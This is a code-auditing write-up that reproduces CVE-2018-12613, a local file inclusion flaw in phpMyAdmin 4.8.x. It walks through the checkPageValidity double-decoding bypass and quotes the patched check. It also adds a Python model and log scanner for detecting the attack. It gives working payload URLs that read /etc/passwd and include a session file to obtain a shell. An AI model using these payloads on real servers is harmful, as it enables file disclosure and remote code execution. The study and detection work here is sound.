
CVE-2018-12613 phpMyAdmin local file inclusion reproduction


This Wind


I recently saw an article that mentioned this, and since I am learning code auditing at the moment I had a look.
Affected versions

  • 4.8.0
  • 4.8.0.1
  • 4.8.1

Environment

phpmyadmin 4.8.1
I used the practice range at https://store.vsplate.com/ directly.

Code analysis

The problem is on line 61 of index.php
(index.php lines 55 to 63)

if (! empty($_REQUEST['target'])
    && is_string($_REQUEST['target'])
    && ! preg_match('/^index/', $_REQUEST['target'])
    && ! in_array($_REQUEST['target'], $target_blacklist)
    && Core::checkPageValidity($_REQUEST['target'])
) {
    include $_REQUEST['target']; // the problem is here
    exit;
}

This block requires all of the following before the include runs:

  • the $_REQUEST['target'] parameter is a string
  • the $_REQUEST['target'] parameter does not start with index (the regex is anchored with ^)
  • the $_REQUEST['target'] parameter is not in the blacklist $target_blacklist
  • the checkPageValidity function returns true

Code of the checkPageValidity function
(Core.php lines 443 to 476)

public static function checkPageValidity(&$page, array $whitelist = [])
{
    if (empty($whitelist)) {
        $whitelist = self::$goto_whitelist; // the whitelist
    }
    if (! isset($page) || !is_string($page)) { // $page is missing or not a string
        return false;
    }

    if (in_array($page, $whitelist)) { // $page is in the whitelist (not exploitable: $page is compared exactly as given)
        return true;
    }

    $_page = mb_substr(
        $page,
        0,
        mb_strpos($page . '?', '?')
    ); // take everything from the first character up to the position before the '?'
    if (in_array($_page, $whitelist)) { // is the part of $page before the '?' in the whitelist (not exploitable: a literal '?' in the request is treated by PHP as the start of the query string)
        return true;
    }

    $_page = urldecode($page); // URL-decode
    $_page = mb_substr(
        $_page,
        0,
        mb_strpos($_page . '?', '?')
    ); // take everything from the first character up to the position before the '?'
    if (in_array($_page, $whitelist)) { // after URL-decoding, is the part before the '?' in the whitelist (exploitable: URL-encoding the '?' gets around the problem described above)
        return true;
    }

    return false;
}

The whitelist

public static $goto_whitelist = array(
    'db_datadict.php',
    'db_sql.php',
    'db_events.php',
    'db_export.php',
    'db_importdocsql.php',
    'db_multi_table_query.php',
    'db_structure.php',
    'db_import.php',
    'db_operations.php',
    'db_search.php',
    'db_routines.php',
    'export.php',
    'import.php',
    'index.php',
    'pdf_pages.php',
    'pdf_schema.php',
    'server_binlog.php',
    'server_collations.php',
    'server_databases.php',
    'server_engines.php',
    'server_export.php',
    'server_import.php',
    'server_privileges.php',
    'server_sql.php',
    'server_status.php',
    'server_status_advisor.php',
    'server_status_monitor.php',
    'server_status_queries.php',
    'server_status_variables.php',
    'server_variables.php',
    'sql.php',
    'tbl_addfield.php',
    'tbl_change.php',
    'tbl_create.php',
    'tbl_import.php',
    'tbl_indexes.php',
    'tbl_sql.php',
    'tbl_export.php',
    'tbl_operations.php',
    'tbl_structure.php',
    'tbl_relation.php',
    'tbl_replace.php',
    'tbl_row_action.php',
    'tbl_select.php',
    'tbl_zoom_select.php',
    'transformation_overview.php',
    'transformation_wrapper.php',
    'user_password.php',
);

Exploitation payload

/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd
When the path /../../../../../../../../etc/passwd is resolved, the file is included, which completes the exploit.

Verifying that the inclusion exists

/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd

[screenshot: UojReJ.png]

Using the session file to get a shell (there are many methods)
(the phpMyAdmin session ID is found in the cookie)

/index.php?target=db_sql.php%253f/../../../../../../../../tmp/sess_01876fad4b7e3596a65aa96048b99def # for some installations the session directory is /tmp, for others it is somewhere else; this tripped me up badly

[screenshot: UojIW6.png]

Fix code in the new phpMyAdmin version

if (isset($GLOBALS['target']) && is_string($GLOBALS['target']) && !empty($GLOBALS['target']) && in_array($GLOBALS['target'], $goto_whitelist)) {
    $main_target = $GLOBALS['target'];
}
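As an added illustration of the three passages above (the checkPageValidity() analysis, the payload, and the fixed check), the following Python models the 4.8.1 whitelist logic next to a strict exact-match check and uses the difference between them as a log-detection criterion. This is example code written for this page, not phpMyAdmin's own; GOTO_WHITELIST is a subset of the $goto_whitelist quoted above, the function names are my own, and the access-log lines are constructed.

```python
"""Model of phpMyAdmin 4.8.1's Core::checkPageValidity() (CVE-2018-12613) next to
the strict exact-match check from the fix, plus a small access-log scanner that
flags requests accepted only by the urldecode() branch.

Added example for this write-up, not phpMyAdmin code. GOTO_WHITELIST is a subset
of the $goto_whitelist quoted above; SAMPLE_LOG lines are constructed."""
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Subset of $goto_whitelist (the full list in the post has about 50 entries).
GOTO_WHITELIST = frozenset({
    "db_sql.php", "db_structure.php", "index.php", "sql.php",
    "server_status.php", "tbl_structure.php", "user_password.php",
})


def _before_question_mark(page: str) -> str:
    """mb_substr($page, 0, mb_strpos($page . '?', '?')): text before the first '?'."""
    return page.split("?", 1)[0]


def accepting_step(page, whitelist=GOTO_WHITELIST) -> int:
    """Which branch of the 4.8.1 check accepts `page`: 1 exact whitelist hit,
    2 hit after stripping a literal '?', 3 hit only after urldecode(), 0 rejected.
    `page` is $_REQUEST['target'], i.e. already decoded once by PHP."""
    if not isinstance(page, str) or page == "":
        return 0
    if page in whitelist:
        return 1
    if _before_question_mark(page) in whitelist:
        return 2
    # The third branch decodes a value PHP has already decoded once. A '%3f'
    # that survived the first decode (sent as '%253f') becomes '?' here, so the
    # whitelist sees "db_sql.php" while include() still gets the raw string.
    if _before_question_mark(unquote_plus(page)) in whitelist:
        return 3
    return 0


def check_page_validity_vulnerable(page, whitelist=GOTO_WHITELIST) -> bool:
    """Return value of the 4.8.1 function."""
    return accepting_step(page, whitelist) != 0


def check_page_validity_fixed(page, whitelist=GOTO_WHITELIST) -> bool:
    """Strict check in the spirit of the fix quoted above: the exact request
    value must be a whitelist member; no '?' stripping, no decoding."""
    return isinstance(page, str) and page != "" and page in whitelist


def php_view_of_target(request_uri: str):
    """What $_REQUEST['target'] holds for a raw request URI: PHP decodes the
    query string exactly once. Returns None when there is no target parameter."""
    values = parse_qs(urlsplit(request_uri).query, keep_blank_values=True).get("target")
    return values[0] if values else None


def passes_only_via_urldecode(request_uri: str) -> bool:
    """Detection criterion: the target reaches include() solely through the
    urldecode() branch (step 3), which is the CVE-2018-12613 pattern."""
    target = php_view_of_target(request_uri)
    return target is not None and accepting_step(target) == 3


# Request line inside an Apache/Nginx combined-format log entry.
REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def scan_access_log(lines):
    """Return the request URIs whose target parameter matches the criterion."""
    hits = []
    for line in lines:
        m = REQUEST_LINE.search(line)
        if m and passes_only_via_urldecode(m.group(1)):
            hits.append(m.group(1))
    return hits


# Constructed sample log lines (not from any real server).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2019:10:00:00 +0000] "GET /index.php?target=db_sql.php HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2019:10:00:01 +0000] "GET /index.php?target=db_sql.php%3fdb=test HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2019:10:00:02 +0000] "GET /index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd HTTP/1.1" 200 2048',
    '10.0.0.9 - - [01/Jan/2019:10:00:03 +0000] "GET /index.php?target=/etc/passwd HTTP/1.1" 403 512',
]

if __name__ == "__main__":
    for uri in scan_access_log(SAMPLE_LOG):
        print("suspicious target:", php_view_of_target(uri))
```

Normal phpMyAdmin navigation is accepted at step 1 or 2, so the scanner only fires on values that need the second decode to look like a whitelisted script; it does not need to know what file the request was trying to reach, which also makes it a useful regression check for any later change to the whitelist logic.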

Reference: https://blog.csdn.net/qq_34444097/article/details/85264686
